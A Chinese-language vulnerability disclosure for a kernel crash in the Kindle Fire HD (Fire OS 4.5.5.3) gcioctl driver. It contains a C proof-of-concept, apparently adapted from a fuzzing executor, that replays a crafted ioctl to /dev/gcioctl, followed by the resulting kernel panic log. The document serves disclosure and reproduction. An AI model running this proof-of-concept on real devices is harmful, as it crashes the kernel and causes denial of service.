一、漏洞简介

Amazon Kindle Fire HD（第 3 代）Fire OS 4.5.5.3 的内核模块 /omap/drivers/misc/gcx/gcioctl/gcif.c 存在缺陷：攻击者可以对设备 /dev/gcioctl 发起命令号为 1077435789 的 ioctl 调用，并通过该调用的参数传入特制数据，导致内核崩溃。

二、漏洞影响

Fire OS 4.5.5.3

三、复现过程

poc

#include<stdio.h>
#include<string.h>      //strlen
#include<sys/socket.h>
#include<arpa/inet.h> //inet_addr
#include<unistd.h>      //write
#include <stdlib.h>
#include <sys/stat.h>
#include <sys/mman.h>
#include <fcntl.h>
#include <stdbool.h>

// Socket boilerplate code taken from here: http://www.binarytides.com/server-client-example-c-sockets-linux/

/*
 Message layout, in the order the fields are parsed in main():
 seed, ioctl_id, num_mappings, num_blobs, dev_name_len, dev_name, map_entry_t_arr, blob_len_arr, blobs
*/
/* Non-zero makes main() print the parsed header fields and the first
 * words of blob 0 before the ioctl is issued. */
int debug = 1;

/*
 * One pointer-fixup record taken from the input message. main() uses it
 * to write a pointer into blob src_id at byte position offset.
 */
typedef struct {
    int src_id;  /* index of the blob that receives the pointer */
    int dst_id;  /* >= 0: index of the blob to point at;
                    <  0: generic buffer, element size is -dst_id */
    int offset;  /* byte offset of the pointer field inside blob src_id */
} map_entry_t;

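/* Boundary values used by gen_rand_val() for 2-byte elements. */
short tiny_vals[18] = {128, 127, 64, 63, 32, 31, 16, 15, 8, 7, 4, 3, 2, 1, 0, 256, 255, -1};
/* Boundary values used for 4- and 8-byte elements; built by populate_arrs(). */
int *small_vals;
/* Number of entries in small_vals. */
int num_small_vals;

/*
 * Build the small_vals table for the upper bound `top`.
 *
 * The table holds, for every power of two p with 2 <= p < top, the pair
 * (p, p - 1) in descending order, followed by 0, top, top - 1 and -1.
 * For top = 8192 that is 4096, 4095, ..., 2, 1, 0, 8192, 8191, -1
 * (28 entries). The result is stored in the globals small_vals and
 * num_small_vals; a table from an earlier call is released first.
 *
 * top is expected to be positive. Exits the process if the table cannot
 * be allocated.
 */
void populate_arrs(int top) {
    /* Unsigned, so the last doubling cannot overflow a signed int when
     * top is close to INT_MAX. */
    unsigned int pow2 = 1;
    int doublings = 0;

    if (top > 1) {
        while (pow2 < (unsigned int)top) {
            pow2 <<= 1;
            doublings++;
        }
    }
    /* Largest power of two strictly below top (0 when there is none). */
    pow2 >>= 1;

    /* One (p, p - 1) pair per power of two from pow2 down to 2, plus the
     * four trailing entries that are always written. Sizing the table from
     * what is actually stored keeps the trailing writes in bounds even
     * when top <= 1 and there are no pairs at all. */
    int pairs = (doublings > 0) ? doublings - 1 : 0;
    int count = 2 * pairs + 4;

    /* calloc zeroes the whole table, not just its first `count` bytes. */
    int *table = calloc((size_t)count, sizeof *table);
    if (table == NULL) {
        printf("Failed to allocate small_vals\n");
        exit(-1);
    }

    int i = 0;
    for (; pow2 > 1; pow2 >>= 1) {
        table[i++] = (int)pow2;
        table[i++] = (int)pow2 - 1;
    }
    table[i++] = 0;
    table[i++] = top;
    table[i++] = top - 1;
    table[i++] = -1;

    free(small_vals);   /* no-op on the first call (small_vals is NULL) */
    small_vals = table;
    num_small_vals = count;
}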

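/*
 * Write one element of `size` bytes at `elem`.
 *
 * With a probability of small_weight percent the element is a boundary
 * value: an entry of tiny_vals for size 2, an entry of small_vals for
 * size 4 or 8 (sign-extended for 8). Any other size on that path ends the
 * process. Otherwise every byte of the element is filled from rand().
 *
 * elem must have room for `size` bytes; it does not need to be aligned.
 * The boundary path assumes short, int and long long are 2, 4 and 8 bytes.
 * The number and order of rand() calls is part of the contract: a given
 * seed has to reproduce the same values.
 */
void gen_rand_val(int size, char *elem,  int small_weight) {
    /* rand() is drawn before the table check so the sequence of draws does
     * not depend on whether the table exists. An empty table falls through
     * to the random-byte path instead of dividing by zero. */
    if ((rand() % 100) < small_weight && num_small_vals > 0) {
        /* Drawn for every size, including 2, to keep the rand() sequence
         * stable. */
        unsigned int idx = (unsigned int)(rand() % num_small_vals);

        switch (size) {
            case 2: {
                int tiny_count = (int)(sizeof(tiny_vals) / sizeof(tiny_vals[0]));
                short chosen = tiny_vals[rand() % tiny_count];
                /* Report the value that is really stored. */
                printf("Choosing %d\n", chosen);
                /* memcpy instead of a cast store: no alignment requirement
                 * on elem. */
                memcpy(elem, &chosen, sizeof chosen);
                break;
            }
            case 4: {
                int chosen = small_vals[idx];
                printf("Choosing %d\n", chosen);
                memcpy(elem, &chosen, sizeof chosen);
                break;
            }
            case 8: {
                long long chosen = small_vals[idx];
                printf("Choosing %d\n", small_vals[idx]);
                memcpy(elem, &chosen, sizeof chosen);
                break;
            }
            default:
                printf("Damn bro. Size: %d\n", size);
                exit(-1);
        }
        return;
    }

    /* Fully random element, one byte per rand() call. */
    for (int i = 0; i < size; i++) {
        elem[i] = (char)(rand()%0x100);
    }
}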

/*
 * Entry point of the test-case executor.
 *
 * Input is one serialized message laid out as
 *   seed, ioctl_id, num_mappings, num_blobs, dev_name_len, dev_name,
 *   map_entry_t_arr, blob_len_arr, blobs
 * The message is parsed, the pointer fields inside the blobs are patched to
 * point at other blobs or at freshly allocated buffers, and blob 0 is passed
 * as the argument of ioctl(ioctl_id) on the device named dev_name.
 *
 * As written, retest is 1 and the unconditional `goto rerun` skips the whole
 * socket server: the message is read back from /sdcard/saved, one ioctl is
 * issued and the process exits. The socket path only runs if that goto and
 * the retest flag are changed.
 *
 * NOTE(review): none of the length, count and index fields taken from the
 * message are validated against the size of the buffer that holds it, so a
 * malformed message can make this process read or write out of bounds in its
 * own address space before the ioctl is reached. See the notes at each step.
 *
 * Returns 1 when bind() or accept() fails and 0 after recv() reports an
 * error; the other failure paths call exit().
 */
int main(int argc , char *argv[])
{
    int num_blobs = 0, num_mappings = 0, i = 0, dev_name_len = 0, j;
    unsigned int ioctl_id = 0;
    char *dev_name;
    // NOTE(review): this tmp is never used; the fixup loop declares its own.
    void *tmp;
    // ptr_arr[k] is the heap copy of blob k, len_arr[k] its length in bytes
    char **ptr_arr;
    int *len_arr;
    unsigned int seed;

    int sockfd , client_sock , c , read_size;
    struct sockaddr_in server , client;
    // NOTE(review): not initialized here; see the note at `rerun`.
    int msg_size;
    // buffers allocated for generic pointers, kept so they can be freed
    void *generic_arr[264];

    // max val for small_vals array
    int top = 8192;
    // number of ioctl calls issued so far, printed before each call
    int cnt = 0;
    // chance that our generics are filled with "small vals"
    int default_weight = 50;
    populate_arrs(top);
    // 1 = replay the message stored in /sdcard/saved once, then exit
    int retest = 1;
    // NOTE(review): jumps into the body of the while loop below. Everything
    // between here and `rerun` (socket setup, recv, `msg_size = 0`, saving
    // the message) is skipped, so that code is unreachable as written.
    goto rerun;



    sockfd = socket(AF_INET , SOCK_STREAM , 0);
    if (sockfd == -1)
    {
        // NOTE(review): the failure is only reported; execution continues
        // with sockfd == -1.
        printf("Could not create socket");
    }
    puts("Socket created");

    setsockopt(sockfd, SOL_SOCKET, SO_REUSEADDR, &(int){ 1 }, sizeof(int));

    // listen on every interface, port taken from the first argument
    // NOTE(review): argc is never checked before argv[1] is read, and atoi()
    // cannot report a bad port string.
    server.sin_family = AF_INET;
    server.sin_addr.s_addr = INADDR_ANY;
    server.sin_port = htons(atoi(argv[1]));

    //Bind
    if( bind(sockfd,(struct sockaddr *)&server , sizeof(server)) < 0)
    {
        //print the error message
        perror("bind failed. Error");
        return 1;
    }
    puts("bind done");
listen:     
    // Listen
    // (also re-entered through `goto listen` after a client disconnects)
    listen(sockfd , 3);

    puts("Waiting for incoming connections...");
    c = sizeof(struct sockaddr_in);

    // accept connection from an incoming client
    client_sock = accept(sockfd, (struct sockaddr *)&client, (socklen_t*)&c);
    if (client_sock < 0)
    {
        perror("accept failed");
        return 1;
    }
    puts("Connection accepted");

    msg_size = 0;
    // Receive a message from client: a 4-byte length, then the message
    // NOTE(review): the length is a signed int supplied by the peer and is
    // used unchecked; a short read of the 4 bytes is not handled either.
    while( (read_size = recv(client_sock , &msg_size , 4 , 0)) > 0 )
    {
        // recv the entire message
        char *recv_buf = calloc(msg_size, sizeof(char));
        if (recv_buf == NULL) {
            printf("Failed to allocate recv_buf\n");
            exit(-1);
        }

        // NOTE(review): a single recv() on a stream socket may return fewer
        // bytes than requested; that case is treated as fatal here.
        int nrecvd = recv(client_sock, recv_buf, msg_size, 0);
        if (nrecvd != msg_size) {
            printf("Error getting all data!\n");
            printf("nrecvd: %d\nmsg_size:%d\n", nrecvd, msg_size);
            exit(-1);
        }
        // quickly save a copy of the most recent data, so the message is
        // still on disk if the ioctl below takes the device down
        // NOTE(review): /sdcard is presumably shared storage, so other apps
        // may be able to read or replace this file - confirm.
        int savefd = open("/sdcard/saved", O_WRONLY|O_TRUNC|O_CREAT, 0644);
        if (savefd < 0) {
            perror("open saved");
            exit(-1);
        }

        int err = write(savefd, recv_buf, msg_size);
        if (err != msg_size) {
            perror("write saved");
            exit(-1);
        }
        fsync(savefd);
        close(savefd);
rerun:
        // Replay path: load the saved message instead of a received one.
        // NOTE(review): when reached through `goto rerun`, msg_size has never
        // been assigned, so the calloc size is indeterminate. The buffer
        // should be sized from fsize instead. The calloc, lseek and read
        // results are not checked, read() may store more bytes than were
        // allocated, and this fd is never closed.
        if (retest) {
            recv_buf = calloc(msg_size, sizeof(char));
            int fd = open("/sdcard/saved", O_RDONLY);
            if (fd < 0) {
                perror("open:");
                exit(-1);
            }
            int fsize = lseek(fd, 0, SEEK_END);
            printf("file size: %d\n", fsize);
            lseek(fd, 0, SEEK_SET);
            read(fd, recv_buf, fsize);
        }

        // head walks through the message as each field is consumed
        char *head = recv_buf;
        seed = 0;
        //seed, ioctl_id, num_mappings, num_blobs, dev_name_len, dev_name, map_entry_t_arr, blob_len_arr, blobs
        // Five 4-byte header fields, copied as-is (host byte order).
        // NOTE(review): nothing checks that the message holds these 20 bytes.
        memcpy(&seed, head, 4);
        head += 4;
        memcpy(&ioctl_id, head, 4);
        head += 4;
        memcpy(&num_mappings, head, 4);
        head += 4;
        memcpy(&num_blobs, head, 4);
        head += 4;
        memcpy(&dev_name_len, head, 4);
        head += 4;

        // srand with new seed, so the rand() draws below repeat for the
        // same message
        srand(seed);

        /* dev name */
        // one extra zeroed byte keeps the copied name NUL-terminated
        // NOTE(review): dev_name_len is used unchecked; a negative value or
        // one larger than the rest of the message is not rejected.
        dev_name = calloc(dev_name_len+1, sizeof(char));
        if (dev_name == NULL) {
            printf("Failed to allocate dev_name\n");
            exit(-1);
        }
        memcpy(dev_name, head, dev_name_len);
        head += dev_name_len;

        /* map */
        // NOTE(review): num_mappings is used unchecked, same concern as
        // dev_name_len.
        map_entry_t *map = calloc(num_mappings, sizeof(map_entry_t));
        if (map == NULL) {
            printf("Failed to allocate map\n");
            exit(-1);
        }

        if (num_mappings != 0) {
            memcpy(map, head, num_mappings*sizeof(map_entry_t));
            head += num_mappings*sizeof(map_entry_t);
        }

        /* blobs */

        // first create an array to store the sizes themselves
        // NOTE(review): num_blobs is used unchecked as well.
        len_arr = calloc(num_blobs, sizeof(int));
        if (len_arr == NULL) {
            printf("Failed to allocate len_arr\n");
            exit(-1);
        }

        // we'll also want an array to store our pointers
        ptr_arr = calloc(num_blobs, sizeof(void *));
        if (ptr_arr == NULL) {
            printf("Failed to allocate ptr_arr\n");
            exit(-1);
        }


        // copy the blob sizes into our size_arr
        for (j=0; j < num_blobs; j++) {
            memcpy(&len_arr[j], head, sizeof(int));
            head += sizeof(int);
        }

        // we'll also want memory bufs for all blobs
        // now that we have the sizes, allocate all the buffers we need
        // NOTE(review): each len_arr[j] comes from the message and is not
        // compared with the bytes that remain in recv_buf.
        for (j=0; j < num_blobs; j++) {
            ptr_arr[j] = calloc(len_arr[j], sizeof(char));
            printf("Sizeof(ptr_arr[%d])=%d\n", j, len_arr[j]);
            printf("ptr_arr[%d]=%p\n", j, ptr_arr[j]);

            //printf("just added %p to ptr_arr\n", ptr_arr[j]);
            if (ptr_arr[j] == NULL) {
                printf("Failed to allocate a blob store\n");
                exit(-1);
            }

            // might as well copy the memory over as soon as we allocate the space
            memcpy((char *)ptr_arr[j], head, len_arr[j]);
            // dump the blob as 32-bit words
            // NOTE(review): when len_arr[j] is not a multiple of 4 the last
            // word read extends past the end of the blob.
            printf("ptr_arr[%d]=\n", j);
            for(i=0;i<len_arr[j];i+=4){
                printf("0x%08x\n", *(unsigned int *)(ptr_arr[j] + i));
            }
            printf("\n");

            head += len_arr[j];
        }

        int num_generics = 0;

        // time for pointer fixup
        // NOTE(review): src_id, dst_id and offset are used as read from the
        // message. src_id and dst_id are not checked against num_blobs and
        // offset is not checked against len_arr[src_id], so the memcpy calls
        // below can write sizeof(void *) bytes outside the blob.
        for (i=0; i < num_mappings; i++) {
            // get out entry
            map_entry_t entry = map[i];
            // pull out the struct to be fixed up
            char *tmp = ptr_arr[entry.src_id];

            // check if this is a struct ptr or just a generic one

            // just a generic one
            if (entry.dst_id < 0) {
                // 90% chance we fixup the generic
                if ( (rand() % 10) > 0) {
                    int buf_len = 128;
                    // NOTE(review): malloc result is not checked.
                    char *tmp_generic = malloc(buf_len);
                    memset(tmp_generic, 0, buf_len);
                    // NOTE(review): the original comment here said "95%
                    // chance we fill it with data", but `> 95` is true only
                    // for 96..99, i.e. about 4% of the time.
                    if ((rand() % 100) > 95) {
                        // if dst_id is < 0, it's abs value is the element size
                        int size = -1 * entry.dst_id;
                        int weight;
                        // if it's a char or some float, never choose a "small val"
                        if (size == 1 || size > 8)
                            weight = 0;
                        else
                            weight = default_weight;

                        // NOTE(review): this reuses the outer loop's index i.
                        // When it finishes i is >= buf_len, so the outer loop
                        // resumes from there and skips mappings. When size
                        // does not divide buf_len, the last gen_rand_val()
                        // call writes past the end of tmp_generic.
                        for (i=0; i < buf_len; i+=size) {
                            gen_rand_val(size, &tmp_generic[i], weight);
                        }
                    }
                    // remember the buffer for cleanup and store its address
                    // in the blob
                    generic_arr[num_generics] = tmp_generic;
                    memcpy(tmp+entry.offset, &tmp_generic, sizeof(void *));
                    num_generics += 1;
                    // the run is aborted once all 264 slots are in use
                    if (num_generics >= 264) {
                        printf("Code a better solution for storing generics\n");
                        exit(1);
                    }
                }
            }

            // a struct ptr, so we have the data
            else {
                // 1 in 400 chance we don't fixup
                if ( (rand() % 400) > 0) {
                    // now point it to the correct struct/blob
                    // printf("placing %p, at %p\n", ptr_arr[entry.dst_id], tmp+entry.offset);
                    memcpy(tmp+entry.offset, &ptr_arr[entry.dst_id], sizeof(void *));
                }
            }
        }

        // Diagnostic dump of the header fields and the first five 8-byte
        // steps of blob 0.
        // NOTE(review): ptr_arr[0] is dereferenced without checking that
        // num_blobs > 0 or that blob 0 is long enough. The address printed
        // before each value is computed from &ptr_arr[0] (the pointer
        // array), not from the blob the value is read from. ioctl_id is
        // unsigned but printed with %d.
        if (debug) {
            printf("ioctl_id: %d\n", ioctl_id);
            printf("num_mappings: %d\n", num_mappings);
            printf("num_blobs: %d\n", num_blobs);
            printf("dev_name_len: %d\n", dev_name_len);
            printf("dev_name: %s\n", dev_name);
            printf("data[]: \n");
            //printf("(0x%x)\n", *(int *)&ptr_arr[0]);
            printf("(0x%p) : ", &ptr_arr[0]);
            printf("(0x%016lx)\n", *(unsigned long int *)ptr_arr[0]);
            printf("(0x%p) : ", (&ptr_arr[0]+1*8));
            printf("(0x%016lx)\n", *(unsigned long int *)(ptr_arr[0]+1*8));

            printf("(0x%p) : ", (&ptr_arr[0]+2*8));
            printf("(0x%016lx)\n", *(unsigned long int *)(ptr_arr[0]+2*8));

            printf("(0x%p) : ", (&ptr_arr[0]+3*8));
            printf("(0x%016lx)\n", *(unsigned long int *)(ptr_arr[0]+3*8));

            printf("(0x%p) : ", (&ptr_arr[0]+4*8));
            printf("(0x%016lx)\n", *(unsigned long int *)(ptr_arr[0]+4*8));

            //printf("(0x%016lx)\n", *(unsigned long int *)(ptr_arr[0]+5*8));
            //printf("(0x%016lx)\n", *(unsigned long int *)(ptr_arr[0]+6*8));

            //printf("(0x%x)\n", (int *)ptr_arr, (int *)ptr_arr);

        }

        // time for the actual ioctl
        // the device path is whatever name the message carried
        //printf("Try to open device %s\n", dev_name);
        //fflush(stdout);
        int fd = open(dev_name, O_RDONLY);
        if (fd < 0) {
            perror("open");
            exit(-1);
        } else {
            printf("Open devicd %s successfully.\n", dev_name);
        }

        //fflush(stdout);
        //printf("Try to call ioctl(fd=%d, ioctl_id=%d, ptr_arr=%p)\n", fd, ioctl_id, ptr_arr[0]);
        // flush first so buffered output is not lost if the call below does
        // not return
        fflush(stdout);
        printf("%10d:", cnt++);
        // blob 0 is the ioctl argument; "good hit" only means that the call
        // did not return -1
        // NOTE(review): <sys/ioctl.h> is not among the file's includes, so
        // ioctl() is called without a prototype.
        if ((ioctl(fd, ioctl_id, ptr_arr[0])) == -1)
            perror("ioctl");

        else
            printf("good hit\n");
        close(fd);
        printf("device %s closed\n", dev_name);

        // replay mode stops after one call; nothing is freed because the
        // process exits
        if (retest)
            exit(0);

        fflush(stdout);
        // release everything allocated for this message
        free(recv_buf);
        free(dev_name);
        if (map != NULL)
            free(map);
        free(len_arr);
        for (i=0; i < num_blobs; i++) {
            //printf("%d: free'ing %p\n", i, ptr_arr[i]);
            free(ptr_arr[i]);
        }
        free(ptr_arr);
        for (i=0; i < num_generics; i++) {
            free(generic_arr[i]);
        }

        // acknowledge by echoing the 4-byte length back to the client
        // NOTE(review): the write() result is ignored.
        write(client_sock, &msg_size, 4);

        msg_size = 0;
    }

    // recv() returned 0: the client closed the connection, wait for the next
    if(read_size == 0)
    {
        puts("Client disconnected");
        fflush(stdout);
        close(client_sock);
        goto listen;
    }
    else if(read_size == -1)
    {
        perror("recv failed");
    }

    return 0;
}

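崩溃日志

日志显示：内核在 c2dm_l1cache+0x30（由 dev_ioctl+0x3f0 调用）处读取未映射的内核地址 d900000c 时触发 Oops，随后 panic 并重启。出错指令以 r3（d9000004）为基址读取，而 r1 指向内核栈（c2d6bea4）；从寄存器和反汇编推测，这是一个按 16 字节步进的循环读出了缓冲区范围，循环次数可能来自用户传入的参数且未做上限检查——需对照 gcif.c 源码确认。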

[  144.428375] Unable to handle kernel paging request at virtual address d900000c
[  144.436462] pgd = dcac0000
[  144.439697] [d900000c] *pgd=00000000
[  144.443939] Internal error: Oops: 5 [#1] PREEMPT SMP ARM
[  144.450012] Modules linked in: omaplfb(O) pvrsrvkm(O) pvr_logger(O)
[  144.457672] CPU: 0    Tainted: G           O  (3.4.83-gd2afc0bae69 #1)
[  144.465118] PC is at c2dm_l1cache+0x30/0x100
[  144.469940] LR is at dev_ioctl+0x3f0/0x10c4
[  144.474670] pc : [<c03187ac>]    lr : [<c031782c>]    psr: a0000013
[  144.474670] sp : c2d6be38  ip : 00000000  fp : c2d6be6c
[  144.487640] r10: 00000000  r9 : d8c0cca8  r8 : 00b8dd90
[  144.493621] r7 : 00000000  r6 : c2d6bea4  r5 : 00b8dd90  r4 : 388b77c4
[  144.500915] r3 : d9000004  r2 : 75e0c121  r1 : c2d6bea4  r0 : 00000000
[  144.508331] Flags: NzCv  IRQs on  FIQs on  Mode SVC_32  ISA ARM  Segment user
[  144.516418] Control: 10c5387d  Table: 9cac004a  DAC: 00000015
[  144.522827] 
[  144.522857] PC: 0xc031872c:
[  144.527954] 872c  e51b2034 e592300c eaffffa5 e30c281c e34c209d e5923000 e3530000 1affffbd
[  144.538482] 874c  eaffffc0 e51b303c e51b1040 e2833001 e51b2034 e1530001 e50b303c e2822010
[  144.549163] 876c  e50b2034 1affff8c eaffff83 c09dc81c e1a0c00d e92ddff0 e24cb004 e24dd00c
[  144.559844] 878c  e3500000 e1a07002 e50b0030 da00000d e0814200 e1a06001 e1a03001 e3a02000
[  144.570404] 87ac  e5930008 e593c004 e2833010 e1530004 e022209c 1afffff9 e3520902 3a000003
[  144.581085] 87cc  e3570002 9a000022 e24bd028 e89daff0 e59f9090 e2818008 e3a0a000 e5963008
[  144.591735] 87ec  e5184008 e3530000 13a05000 1a00000a ea000010 e5181004 e5993024 e0841001
[  144.602416] 880c  e12fff33 e5962008 e2855001 e596300c e1550002 e0844003 2a000006 e2572000
[  144.612976] 
[  144.612976] LR: 0xc03177ac:
[  144.618072] 77ac  ebf55c15 eaffff35 e3053d8d e3443038 e1510003 1affff30 e1a0200d e3c23d7f
[  144.628631] 77cc  e3c3303f e24b0064 e5933008 e2952038 30d22003 33a03000 e3530000 1a0001a8
[  144.639160] 77ec  e1a01005 e3a02038 ebfcfa90 e3500000 1a00000e e51b2030 e3520001 0a0001cb
[  144.649780] 780c  e3520002 0a0001ee e3520000 1a000007 e51b0064 e3a02000 e24b1060 eb0003d3
[  144.660369] 782c  e51b0064 e24b1060 e51b2030 eb000338 e3a05000 eaffff11 e24b1064 e50b1088
[  144.670776] 784c  e51b0088 e3a01010 ebfd03c1 e3a03004 e50b3064 e5963008 e2952004 30d22003
[  144.681213] 786c  33a03000 e3530000 0a0001c5 e3e0500d eaffff02 e1a0200d e3c26d7f e3c6603f
[  144.691528] 788c  e5963008 e2952008 30d22003 33a03000 e3530000 1a000021 e24b3064 e1a01005
[  144.701995] 
[  144.701995] SP: 0xc2d6bdb8:
[  144.706878] bdb8  c2d6be24 00b8dd90 c2d6bdec c2d6bdd0 c00084d0 c03187ac a0000013 ffffffff
[  144.717407] bdd8  c2d6be24 00b8dd90 c2d6be6c c2d6bdf0 c06a5318 c0008370 00000000 c2d6bea4
[  144.727905] bdf8  75e0c121 d9000004 388b77c4 00b8dd90 c2d6bea4 00000000 00b8dd90 d8c0cca8
[  144.738586] be18  00000000 c2d6be6c 00000000 c2d6be38 c031782c c03187ac a0000013 ffffffff
[  144.749145] be38  c02ba53c 575b4b92 d8578000 00000000 00b8dd90 0000000b dcae46c0 00b8dd90
[  144.759796] be58  d8c0cca8 00000000 c2d6bf04 c2d6be70 c031782c c0318788 00000001 00000088
[  144.770355] be78  000ffeff 00000001 c2d6bedc c2d6be90 c0207454 c00bd920 00000027 d7ce5000
[  144.781005] be98  c2d6bed4 c2d6bea8 575b4b92 4ccba3b5 47a0578f 83b275c7 00000000 00020261
[  144.791687] 
[  144.791687] FP: 0xc2d6bdec:
[  144.796661] bdec  c0008370 00000000 c2d6bea4 75e0c121 d9000004 388b77c4 00b8dd90 c2d6bea4
[  144.807189] be0c  00000000 00b8dd90 d8c0cca8 00000000 c2d6be6c 00000000 c2d6be38 c031782c
[  144.817840] be2c  c03187ac a0000013 ffffffff c02ba53c 575b4b92 d8578000 00000000 00b8dd90
[  144.828399] be4c  0000000b dcae46c0 00b8dd90 d8c0cca8 00000000 c2d6bf04 c2d6be70 c031782c
[  144.839080] be6c  c0318788 00000001 00000088 000ffeff 00000001 c2d6bedc c2d6be90 c0207454
[  144.849761] be8c  c00bd920 00000027 d7ce5000 c2d6bed4 c2d6bea8 575b4b92 4ccba3b5 47a0578f
[  144.860290] beac  83b275c7 00000000 00020261 00000000 00000000 00000000 00000000 00000000
[  144.870971] becc  00000000 00000000 00000000 c02089fc 00000000 dcae46c0 0000000b dcae46c0
[  144.881652] 
[  144.881652] R1: 0xc2d6be24:
[  144.886627] be24  c2d6be38 c031782c c03187ac a0000013 ffffffff c02ba53c 575b4b92 d8578000
[  144.897308] be44  00000000 00b8dd90 0000000b dcae46c0 00b8dd90 d8c0cca8 00000000 c2d6bf04
[  144.907989] be64  c2d6be70 c031782c c0318788 00000001 00000088 000ffeff 00000001 c2d6bedc
[  144.918518] be84  c2d6be90 c0207454 c00bd920 00000027 d7ce5000 c2d6bed4 c2d6bea8 575b4b92
[  144.929199] bea4  4ccba3b5 47a0578f 83b275c7 00000000 00020261 00000000 00000000 00000000
[  144.939849] bec4  00000000 00000000 00000000 00000000 00000000 c02089fc 00000000 dcae46c0
[  144.950531] bee4  0000000b dcae46c0 00b8dd90 d8c0cca8 00000000 c2d6bf74 c2d6bf08 c0136044
[  144.961059] bf04  c0317448 00000000 00000000 00000000 00000001 00000000 dd045190 dcf8c440
[  144.971710] 
[  144.971710] R3: 0xd8ffff84:
[  144.976623] ff84  d8ffff20 d8efb000 00000707 020e40fb d8efb075 d8ffff3c d8efb01c d8ffffa0
[  144.987213] ffa4  d8ffffa0 d8efb028 ca9788f0 d8ffffb0 d8ffffb0 00000000 bf06e9c8 80000088
[  144.997772] ffc4  dd2eac00 dd309540 00000000 00000000 00000000 00000000 00000000 00000000
[  145.008392] ffe4  00000000 00000000 00000000 00000000 00000000 00000000 00000000 ********
[  145.018798] 0004  ******** ******** ******** ******** ******** ******** ******** ********
[  145.029327] 0024  ******** ******** ******** ******** ******** ******** ******** ********
[  145.039886] 0044  ******** ******** ******** ******** ******** ******** ******** ********
[  145.050384] 0064  ******** ******** ******** ******** ******** ******** ******** ********
[  145.060913] 
[  145.060913] R6: 0xc2d6be24:
[  145.066009] be24  c2d6be38 c031782c c03187ac a0000013 ffffffff c02ba53c 575b4b92 d8578000
[  145.076568] be44  00000000 00b8dd90 0000000b dcae46c0 00b8dd90 d8c0cca8 00000000 c2d6bf04
[  145.087219] be64  c2d6be70 c031782c c0318788 00000001 00000088 000ffeff 00000001 c2d6bedc
[  145.097900] be84  c2d6be90 c0207454 c00bd920 00000027 d7ce5000 c2d6bed4 c2d6bea8 575b4b92
[  145.108459] bea4  4ccba3b5 47a0578f 83b275c7 00000000 00020261 00000000 00000000 00000000
[  145.118988] bec4  00000000 00000000 00000000 00000000 00000000 c02089fc 00000000 dcae46c0
[  145.129638] bee4  0000000b dcae46c0 00b8dd90 d8c0cca8 00000000 c2d6bf74 c2d6bf08 c0136044
[  145.140319] bf04  c0317448 00000000 00000000 00000000 00000001 00000000 dd045190 dcf8c440
[  145.150848] 
[  145.150848] R9: 0xd8c0cc28:
[  145.155944] cc28  d8c0cc28 d8c0cc28 00000000 00000000 00000000 c06bc674 000200da c09dda58
[  145.166503] cc48  00000000 00000000 d8c0cc50 d8c0cc50 00000000 c0aa5174 c0aa5174 c0aa5148
[  145.177062] cc68  5aefd94b 00000000 00000000 00000000 d8c0cc80 9ad1f453 00000000 00000000
[  145.187713] cc88  00200000 00000000 00000000 d8c0cc94 d8c0cc94 dd3b56c0 dd3b56c0 00000000
[  145.198394] cca8  000521a4 000003e8 000003e8 00000000 00000000 00000000 c06b9600 dd150400
[  145.208923] ccc8  d8c0cd80 dd3e3e70 00001064 00000001 0fb00000 5aefd94b 2d2b4d13 5aefd94b
[  145.219573] cce8  2d2b4d13 5aefd94b 2d2b4d13 00000000 00000000 00000000 00000000 00000000
[  145.230255] cd08  00000000 00000000 00000000 00000000 00000001 00000000 00000000 d8c0cd24
[  145.240936] Process executor32 (pid: 3810, stack limit = 0xc2d6a2f8)
[  145.248016] Stack: (0xc2d6be38 to 0xc2d6c000)
[  145.253082] be20:                                                       c02ba53c 575b4b92
[  145.262176] be40: d8578000 00000000 00b8dd90 0000000b dcae46c0 00b8dd90 d8c0cca8 00000000
[  145.271392] be60: c2d6bf04 c2d6be70 c031782c c0318788 00000001 00000088 000ffeff 00000001
[  145.280609] be80: c2d6bedc c2d6be90 c0207454 c00bd920 00000027 d7ce5000 c2d6bed4 c2d6bea8
[  145.289703] bea0: 575b4b92 4ccba3b5 47a0578f 83b275c7 00000000 00020261 00000000 00000000
[  145.298919] bec0: 00000000 00000000 00000000 00000000 00000000 00000000 c02089fc 00000000
[  145.308105] bee0: dcae46c0 0000000b dcae46c0 00b8dd90 d8c0cca8 00000000 c2d6bf74 c2d6bf08
[  145.317352] bf00: c0136044 c0317448 00000000 00000000 00000000 00000001 00000000 dd045190
[  145.326416] bf20: dcf8c440 c2d6bf0c c2d6a000 00b8dd80 00b8dd90 40385d8d dcae46c0 0000000b
[  145.335662] bf40: c2d6a000 00000000 c2d6bf64 00000000 00b8dd90 40385d8d dcae46c0 0000000b
[  145.344879] bf60: c2d6a000 00000000 c2d6bfa4 c2d6bf78 c01365e0 c0135fc4 00000000 00000000
[  145.354095] bf80: c0013e08 00b8dd80 000121c0 00000000 00000036 c0013e08 00000000 c2d6bfa8
[  145.363159] bfa0: c0013c60 c0136578 00b8dd80 000121c0 0000000b 40385d8d 00b8dd90 00b8dd90
[  145.372406] bfc0: 00b8dd80 000121c0 00000000 00000036 00000000 00000000 00000000 bee035f4
[  145.381622] bfe0: 810100fc bee030f4 00011578 0002b28c 60000010 0000000b 4d6969d9 03020430
[  145.390686] Backtrace: 
[  145.393829] [<c031877c>] (c2dm_l1cache+0x0/0x100) from [<c031782c>] (dev_ioctl+0x3f0/0x10c4)
[  145.403228] [<c031743c>] (dev_ioctl+0x0/0x10c4) from [<c0136044>] (do_vfs_ioctl+0x8c/0x5b4)
[  145.412658] [<c0135fb8>] (do_vfs_ioctl+0x0/0x5b4) from [<c01365e0>] (sys_ioctl+0x74/0x84)
[  145.421874] [<c013656c>] (sys_ioctl+0x0/0x84) from [<c0013c60>] (ret_fast_syscall+0x0/0x30)
[  145.431304]  r8:c0013e08 r7:00000036 r6:00000000 r5:000121c0 r4:00b8dd80
[  145.439605] Code: e0814200 e1a06001 e1a03001 e3a02000 (e5930008) 
[  145.450225] Board Information: 
[  145.450225]  Revision : 0001
[  145.450256]  Serial    : 0000000000000000
[  145.450256] SoC Information:
[  145.450256]  CPU    : OMAP4470
[  145.450286]  Rev    : ES1.0
[  145.450286]  Type    : HS
[  145.450286]  Production ID: 0002B975-000000CC
[  145.450286]  Die ID    : 1CC60000-50002FFF-0B00935D-11007004
[  145.450317] 
[  145.485900] ---[ end trace 0fe3b4c74b4e9fa7 ]---
[  145.491149] Kernel panic - not syncing: Fatal exception
[  145.496917] CPU1: stopping
[  145.500152] Backtrace: 
[  145.503204] [<c0018148>] (dump_backtrace+0x0/0x10c) from [<c0698bb8>] (dump_stack+0x18/0x1c)
